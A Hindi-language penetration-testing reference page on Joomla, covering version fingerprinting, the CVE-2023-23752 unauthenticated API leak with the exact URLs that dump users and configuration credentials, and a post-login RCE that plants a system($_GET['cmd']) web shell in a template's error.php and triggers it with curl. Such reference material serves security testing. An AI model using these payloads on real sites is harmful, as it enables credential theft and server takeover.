Joomla
जूमला आंकड़े
जूमला कुछ गैर-पहचानी उपयोग सांख्यिकी जमा करता है जैसे जूमला, PHP और डेटाबेस संस्करण और जूमला स्थापनाओं पर उपयोग में सर्वर ऑपरेटिंग सिस्टम का विवरण। इस डेटा को उनके सार्वजनिक API के माध्यम से क्वेरी किया जा सकता है।
जांच
खोज/फुटप्रिंटिंग
मेटा की जांच करें
रोबोट्स.टेक्स्ट
README.txt
संस्करण
/administrator/manifests/files/joomla.xml में आप संस्करण देख सकते हैं।
/language/en-GB/en-GB.xml में जूमला का संस्करण प्राप्त कर सकते हैं।
plugins/system/cache/cache.xml में लगभग संस्करण देख सकते हैं।
API अनअथेंटिकेटेड जानकारी लीक:
संस्करण 4.0.0 से 4.2.7 तक Unauthenticated जानकारी लीक (CVE-2023-23752) के लिए वंर्नरबल है जो क्रेडेंशियल्स और अन्य जानकारी को डंप करेगा।
उपयोगकर्ता:
http://<host>/api/v1/users?public=true
कॉन्फ़िग फ़ाइल:
http://<host>/api/index.php/v1/config/application?public=true
MSF मॉड्यूल: scanner/http/joomla_api_improper_access_checks
या रूबी स्क्रिप्ट: 51334
ब्रूट-फ़ोर्स
आप लॉगिन को ब्रूट फ़ोर्स करने के लिए इस स्क्रिप्ट का उपयोग कर सकते हैं।
RCE
यदि आपने व्यवस्थापक क्रेडेंशियल प्राप्त किए हैं तो आप एक स्निपेट PHP कोड जोड़कर इसमें RCE प्राप्त कर सकते हैं। हम इसे एक टेम्पलेट को कस्टमाइज़ करके कर सकते हैं।
Configuration
के नीचेTemplates
परक्लिक
करें ताकि टेम्पलेट मेनू खुले।Template
स्तंभ के तहतprotostar
का चयन करें। यह हमेंTemplates: Customise
पृष्ठ पर ले जाएगा।अंततः, आप पृष्ठ स्रोत खोलने के लिए पृष्ठ पर क्लिक कर सकते हैं। हम
error.php
पृष्ठ का चयन करेंगे। हम निम्नलिखित रूप में PHP वन-लाइनर जोड़ेंगे ताकि कोड निष्पादन प्राप्त करें:system($_GET['cmd']);
सहेजें और बंद करें
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Last updated